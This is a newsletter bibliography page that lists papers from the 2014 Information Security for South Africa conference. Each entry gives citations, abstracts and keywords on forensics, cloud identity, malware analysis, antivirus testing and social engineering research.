Visible to the public Information Security for South Africa

SoS Newsletter- Advanced Book Block

Information Security for South Africa

The conference on Information Security for South Africa (ISSA), 2014, was held 13-14 August 2014 at Johannesburg, South Africa.  The 2014 conference was held under the auspices of the University of Johannesburg Academy for Computer Science and Software Engineering, the University of South Africa School of Computing and the University of Pretoria Department of Computer Science.  The works cited here are more technical and general in nature and do not include many excellent papers focused on the unique issues of South Africa.


Valjarevic, Aleksandar; Venter, Hein S.; Ingles, Melissa, "Towards a Prototype For Guidance And Implementation Of A Standardized Digital Forensic Investigation Process," Information Security for South Africa (ISSA), 2014, pp.1,8, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950488 Performing a digital forensic investigation requires a standardized and formalized process to be followed. There currently is neither an international standard formalizing such process nor does a global, harmonized digital forensic investigation process exist. Further, there exists no application that would guide a digital forensic investigator to efficiently implement such a process. This paper proposes the implementation of such a prototype in order to cater for this need. A comprehensive and harmonized digital forensic investigation process model has been proposed by the authors in their previous work and this model is used as a basis of the prototype. The prototype is in the form of a software application which would have two main functionalities. The first functionality would be to act as an expert system that can be used for guidance and training of novice investigators. The second functionality would be to enable reliable logging of all actions taken within the processes proposed in a comprehensive and harmonized digital forensic investigation process model. Ultimately, the latter functionality would enable the validation of use of a proper process. The benefits of such prototype include possible improvement in efficiency and effectiveness of an investigation due to the fact that clear guidelines will be provided when following the process for the course of the investigation. Another benefit includes easier training of novice investigators. The last, and possibly most important benefit, includes that higher admissibility of digital evidence as well as results and conclusions of digital forensic investigations will be possible due to the fact that it will be easier to show that the correct standardized process was followed.

Keywords: Analytical models; Cryptography; Irrigation; ISO/IEC 27043; digital forensic investigation process model; digital forensics; harmonization; implementation prototype  standardization (ID#: 14-3404)



Trenwith, Philip M.; Venter, Hein S., "A Digital Forensic Model For Providing Better Data Provenance In The Cloud," Information Security for South Africa (ISSA), 2014, pp.1,6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950489 The cloud has made digital forensic investigations exceedingly difficult due to the fact that data may be spread over an ever-changing set of hosts and data centres. The normal search and seizure approach that digital forensic investigators tend to follow does not scale well in the cloud because it is difficult to identify the physical devices that data resides on. In addition, the location of these devices is often unknown or unreachable. A solution to identifying the physical device can be found in data provenance. Similar to the tags included in an email header, indicating where the email originated, a tag added to data, as it is passed on by nodes in the cloud, identifies where the data came from. If such a trace can be provided for data in the cloud it may ease the investigating process by indicating where the data can be found. In this research the authors propose a model that aims to identify the physical location of data, both where it originated and where it has been as it passes through the cloud. This is done through the use of data provenance. The data provenance records will provide digital investigators with a clear record of where the data has been and where it can be found in the cloud.

Keywords: Cloud computing; Computational modeling; Computers; Digital forensics; Open systems; Protocols; Servers; Cloud Computing; Digital Forensic Investigation; Digital Forensics; annotations; bilinear pairing technique; chain of custody; data provenance (ID#: 14-3405)



Mpofu, Nkosinathi; van Staden, Wynand JC, "A Survey Of Trust Issues Constraining The Growth Of Identity Management-as-a-Service(IdMaaS)," Information Security for South Africa (ISSA), 2014, pp.1,6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950490 Identity management-as-a-service (IdMaaS) is a cloud computing service where the identity management function is moved to the cloud, streamlining the responsibilities of the computing or IT departments of organisations. IdMaaS's attractiveness leans on reduced cost of ownership, least to no capital investment, scalability, self-service, location independence and rapid deployment, however, its growth has been impeded by issues most of which are related to security, privacy and trust. Most organisations view identities as passports to key computing resources (hardware, software and data) as such they view identity management as a core IT function which must remain within the perimeter of sphere of control. This paper primarily aims to discuss IdMaaS and highlight the major trust issues in current existing cloud computing environments affecting the growth of IdMaaS by describing IdMaaS and surveying the trust issues that pose threats to its growth. Highlighting the trust issues hampering the growth of IdMaaS will lay a foundation for subsequent research efforts directed at addressing trust issues and therefore enhancing the growth of IdMaaS. Consequently the growth of IdMaaS will open up a new entrepreneurial avenue for service providers, at the same time enabling IdMaaS consumers to realise the benefits which come along with cloud computing. In future, we will analyse and evaluate the extent of impact posed by each trust issue to IdMaaS.

Keywords: Authentication; Authorization; Availability; Cloud computing; identity management; identity management-as- as-service; trust (ID#: 14-3406)



Mumba, Emilio Raymond; Venter, H.S., "Mobile Forensics Using The Harmonised Digital Forensic Investigation Process," Information Security for South Africa (ISSA), 2014pp. 1, 10, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950491 Mobile technology is among the fastest developing technologies that have changed the way we live our daily lives. Over the past few years, mobile devices have become the most popular form of communication around the world. However, bundled together with the good and advanced capabilities of the mobile technology, mobile devices can also be used to perform various activities that may be of malicious intent or criminal in nature. This makes mobile devices a valuable source of digital evidence. For this reason, the technological evolution of mobile devices has raised the need to develop standardised investigation process models and procedures within the field of digital forensics. This need further supports the fact that forensic examiners and investigators face challenges when performing data acquisition in a forensically sound manner from mobile devices. This paper, therefore, aims at testing the harmonised digital forensic investigation process through a case study of a mobile forensic investigation. More specifically, an experiment was conducted that aims at testing the performance of the harmonised digital forensic investigation process (HDFIP) as stipulated in the ISO/IEC 27043 draft international standard through the extraction of potential digital evidence from mobile devices.

Keywords: ISO standards; Performance evaluation; Harmonised Digital Forensic Investigation Process (HDFIP); ISO/IEC 27043;mobile device; mobile forensics (ID#: 14-3407)



Schnarz, Pierre; Fischer, Clemens; Wietzke, Joachim; Stengel, Ingo, "On a Domain Block Based Mechanism To Mitigate Dos Attacks On Shared Caches In Asymmetric Multiprocessing Multi Operating Systems," Information Security for South Africa (ISSA), 2014, pp.1, 8, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950494 Asymmetric multiprocessing (AMP) based multi-OSs are going to be established in future to enable parallel execution of different functionalities while fulfilling requirements for real-time, reliability, trustworthiness and security. Especially for in-car multimedia systems, also known as In-Vehicle Infotainment (IVI) systems, the composition of different OS-types onto a system-on-chip (SoC) offers a wide variety of advantages in embedded system development. However, the asymmetric paradigm, which implies the division and assignment of every hardware resource to OS-domains, is not applicable to every part of a system-on-chip (SoC). Caches are often shared between multiple processors on multi processor SoCs (MP-SoC). According to their association to the main memory, OSs running on the processor cores are naturally vulnerable to DoS attacks. An adversary who has compromised one of the OS-domains is able to attack an arbitrary memory location of a co-OS-domain. This introduces performance degradations on victim's memory accesses. In this work a method is proposed which prohibits the surface for interference, introduced by the association of cache and main memory. Therefore, the contribution of this article is twofold. It introduces an attack vector, by deriving an algorithm from the cache way associativity, to affect the co-OSs running on the same platform. Using this vector it is shown that the mapping of contiguous memory blocks intensifies the effect. Subsequently, a memory mapping method is proposed which mitigates the interference effects of cache coherence. The approach is evaluated by a proof-of-concept implementation, which illustrates the performance impact of the attack and the countermeasure, respectively. The method enables a more reliable implementation of AMP-based multi-OSs on MP-SoCs using shared caches without the need to modify the hardware layout.

Keywords: Computer architecture; Computer crime; Hardware; Interference; Program processors; System-on-chip; Vectors (ID#: 14-3408)



Wrench, Peter M.; Irwin, Barry V.W., "Towards a Sandbox For The Deobfuscation And Dissection of PHP Malware," Information Security for South Africa (ISSA), 2014, pp. 1, 8, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950504 The creation and proliferation of PHP-based Remote Access Trojans (or web shells) used in both the compromise and post exploitation of web platforms has fuelled research into automated methods of dissecting and analysing these shells. Current malware tools disguise themselves by making use of obfuscation techniques designed to frustrate any efforts to dissect or reverse engineer the code. Advanced code engineering can even cause malware to behave differently if it detects that it is not running on the system for which it was originally targeted. To combat these defensive techniques, this paper presents a sandbox-based environment that aims to accurately mimic a vulnerable host and is capable of semi-automatic semantic dissection and syntactic deobfuscation of PHP code.

Keywords: Arrays; Databases; Decoding; Malware; Process control; Semantics; Software; Code deobfuscation; Reverse engineering; Sandboxing (ID#: 14-3409)



Ophoff, Jacques; Robinson, Mark, "Exploring End-User Smartphone Security Awareness Within A South African Context," Information Security for South Africa (ISSA), 2014, pp.1, 7, 13-14 Aug. 2014

doi: 10.1109/ISSA.2014.6950500 International research has shown that users are complacent when it comes to smartphone security behaviour. This is contradictory, as users perceive data stored on the ‘smart’ devices to be private and worth protecting. Traditionally less attention is paid to human factors compared to technical security controls (such as firewalls and antivirus), but there is a crucial need to analyse human aspects as technology alone cannot deliver complete security solutions. Increasing a user's knowledge can improve compliance with good security practices, but for trainers and educators to create meaningful security awareness materials they must have a thorough understanding of users' existing behaviours, misconceptions and general attitude towards smartphone security.

Keywords: Androids; Context; Humanoid robots; Portable computers; Security; Awareness and Training in Security; Mobile Computing Security; Smartphone (ID#: 14-3410)



Hauger, Werner K.; Olivier, Martin S., "The Role Of Triggers In Database Forensics," Information Security for South Africa (ISSA), 2014, pp.1, 7, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950506 An aspect of database forensics that has not received much attention in the academic research community yet is the presence of database triggers. Database triggers and their implementations have not yet been thoroughly analysed to establish what possible impact they could have on digital forensic analysis methods and processes. Conventional database triggers are defined to perform automatic actions based on changes in the database. These changes can be on the data level or the data definition level. Digital forensic investigators might thus feel that database triggers do not have an impact on their work. They are simply interrogating the data and metadata without making any changes. This paper attempts to establish if the presence of triggers in a database could potentially disrupt, manipulate or even thwart forensic investigations. The database triggers as defined in the SQL standard were studied together with a number of database trigger implementations. This was done in order to establish what aspects might have an impact on digital forensic analysis. It is demonstrated in this paper that some of the current database forensic analysis methods are impacted by the possible presence of certain types of triggers in a database. Furthermore, it finds that the forensic interpretation and attribution processes should be extended to include the handling and analysis of database triggers if they are present in a database.

Keywords: Databases; Dictionaries; Forensics; Irrigation; Monitoring; Reliability; database forensics; database triggers; digital forensic analysis; methods; processes (ID#: 14-3411)



Savola, Reijo M.; Kylanpaa, Markku, "Security Objectives, Controls And Metrics Development For An Android Smartphone Application," Information Security for South Africa (ISSA), 2014, pp.1, 8, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950501 Security in Android smartphone platforms deployed in public safety and security mobile networks is a remarkable challenge. We analyse the security objectives and controls for these systems based on an industrial risk analysis. The target system of the investigation is an Android platform utilized for public safety and security mobile network. We analyse how a security decision making regarding this target system can be supported by effective and efficient security metrics. In addition, we describe implementation details of security controls for authorization and integrity objectives of a demonstration of the target system.

Keywords: Authorization; Libraries; Monitoring; Android; risk analysis; security effectiveness; security metrics; security objectives (ID#: 14-3412)



Haffejee, Jameel; Irwin, Barry, "Testing Antivirus Engines To Determine Their Effectiveness As A Security Layer," Information Security for South Africa (ISSA), 2014, pp.1, 6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950496 This research has been undertaken to empirically test the assumption that it is trivial to bypass an antivirus application and to gauge the effectiveness of antivirus engines when faced with a number of known evasion techniques. A known malicious binary was combined with evasion techniques and deployed against several antivirus engines to test their detection ability. The research also documents the process of setting up an environment for testing antivirus engines as well as building the evasion techniques used in the tests. This environment facilitated the empirical testing that was needed to determine if the assumption that antivirus security controls could easily be bypassed. The results of the empirical tests are also presented in this research and demonstrate that it is indeed within reason that an attacker can evade multiple antivirus engines without much effort. As such while an antivirus application is useful for protecting against known threats, it does not work as effectively against unknown threats.

Keywords: Companies; Cryptography; Engines; Malware; Payloads; Testing; Antivirus; Defense; Malware (ID#: 14-3413)



van Staden, Wynand JC, "An Investigation Into Reducing Third Party Privacy Breaches During The Investigation Of Cybercrime," Information Security for South Africa (ISSA), 2014, pp.1,6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950503 In this article we continue previous work in which a framework for preventing or limiting a privacy breach of a third party during the investigation of cybercrime. The investigations may be conducted internally (by the enterprise), or externally (by a third party, or a law enforcement agency) depending on the jurisdiction and context of the case. In many cases, an enterprise will conduct an internal investigation against some allegation of wrongdoing by an employee, or a client. In these cases maintaining the privacy promise made to other clients or customers is an ideal that the enterprise may wish to honour, especially if the image or brand of the enterprise may be impacted when the details of the process followed during the investigation becomes clear. The article reports on the results of the implementation of the privacy breach detection - it also includes lessons learned, and proposes further steps for refining the breach detection techniques and methods for future digital forensic investigation.

Keywords: Business; Context; Digital forensics; Electronic mail; Indexes; Postal services; Privacy; Cybercrime; Digital Forensics; Privacy; Privacy Breach; Third Party Privacy (ID#: 14-3414)



Mirza, Abdul; Senekane, Makhamisa; Petruccione, Francesco; van Niekerk, Brett, "Suitability of Quantum Cryptography For National Facilities," Information Security for South Africa (ISSA), 2014, pp.1, 7, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950513 Quantum cryptography, or more accurately Quantum Key Distribution (QKD), provides a secure mechanism to exchange encryption keys which can detect potential eavesdroppers. However, this is a relatively new technology in terms of implementation, and there are some concerns over possible attacks. This paper describes QKD and provides an overview of the implementations in South Africa. From this, a basic vulnerability assessment is performed to determine the suitability of QKD for use in critical national facilities. While there are vulnerabilities, some of these can be easily mitigated through proper design and planning. The implementation of QKD as an additional layer to the encryption process may serve to improve the security between national key points.

Keywords: Cryptography; Educational institutions; Quantum mechanics; TV; critical infrastructure protection; quantum cryptography; quantum key distribution; vulnerability assessment (ID#: 14-3415)



du Plessis, Warren P., "Software-Defined Radio (SDR) As A Mechanism For Exploring Cyber-Electronic Warfare (EW) Collaboration," Information Security for South Africa (ISSA), 2014, pp.1,6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950516 Cyber is concerned with networks of systems in all their possible forms. Electronic warfare (EW) is focused on the many different uses of the electromagnetic spectrum (EMS). Given that many networks make use of the EMS (wireless networks), there is clearly large scope for collaboration between the cyber-warfare and EW communities. Unfortunately, such collaboration is complicated by the significant differences between these two realms. Software-defined radio (SDR) systems are based on interfaces between the EMS and computers and thus offer tremendous potential for encouraging cyber-EW collaboration. The concept of SDR is reviewed along with some hardware and software SDR systems. These are then used to propose a number of projects where SDR systems allow collaboration between the cyber and EW realms to achieve effects which neither realm could achieve alone.

Keywords: Bandwidth; Collaboration; Computers; Hardware; Protocols; Software; Standards; Electronic warfare (EW); cyber; electromagnetic spectrum (EMS); software-defined radio (SDR) (ID#: 14-3416)



Tekeni, Luzuko; Thomson, Kerry-Lynn; Botha, Reinhardt A., "Concerns Regarding Service Authorization By IP Address Using Eduroam," Information Security for South Africa (ISSA), 2014, pp.1,6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950495 Eduroam is a secure WLAN roaming service between academic and research institutions around the globe. It allows users from participating institutions secure Internet access at any other participating visited institution using their home credentials. The authentication credentials are verified by the home institution, while authorization is done by the visited institution. The user receives an IP address in the range of the visited institution, and accesses the Internet through the firewall and proxy servers of the visited institution. However, access granted to services that authorize via an IP address of the visited institution may include access to services that are not allowed at the home institution, due to legal agreements. This paper looks at typical legal agreements with service providers and explores the risks and countermeasures that need to be considered when using eduroam.

Keywords: IEEE Xplore; Servers; Authorization; IP-Based; Service Level Agreement; eduroam (ID#: 14-3417)



Mouton, Francois; Malan, Mercia M.; Leenen, Louise; Venter, H.S., "Social Engineering Attack Framework," Information Security for South Africa (ISSA), 2014, pp.1,9, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950510 The field of information security is a fast growing discipline. Even though the effectiveness of security measures to protect sensitive information is increasing, people remain susceptible to manipulation and the human element is thus a weak link. A social engineering attack targets this weakness by using various manipulation techniques in order to elicit sensitive information. The field of social engineering is still in its infancy stages with regards to formal definitions and attack frameworks. This paper proposes a social engineering attack framework based on Kevin Mitnick's social engineering attack cycle. The attack framework addresses shortcomings of Mitnick's social engineering attack cycle and focuses on every step of the social engineering attack from determining the goal of an attack up to the successful conclusion of the attack. The authors use a previously proposed social engineering attack ontological model which provides a formal definition for a social engineering attack. The ontological model contains all the components of a social engineering attack and the social engineering attack framework presented in this paper is able to represent temporal data such as flow and time. Furthermore, this paper demonstrates how historical social engineering attacks can be mapped to the social engineering attack framework. By combining the ontological model and the attack framework, one is able to generate social engineering attack scenarios and to map historical social engineering attacks to a standardised format. Scenario generation and analysis of previous attacks are useful for the development of awareness, training purposes and the development of countermeasures against social engineering attacks.

Keywords: Ash; Buildings; Data models; Electronic mail; Information security; Vectors; Bidirectional Communication; Indirect Communication; Mitnick's Attack Cycle; Ontological Model; Social Engineering; Social Engineering Attack; Social Engineering Attack Framework; Unidirectional Communication (ID#: 14-3418)



Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.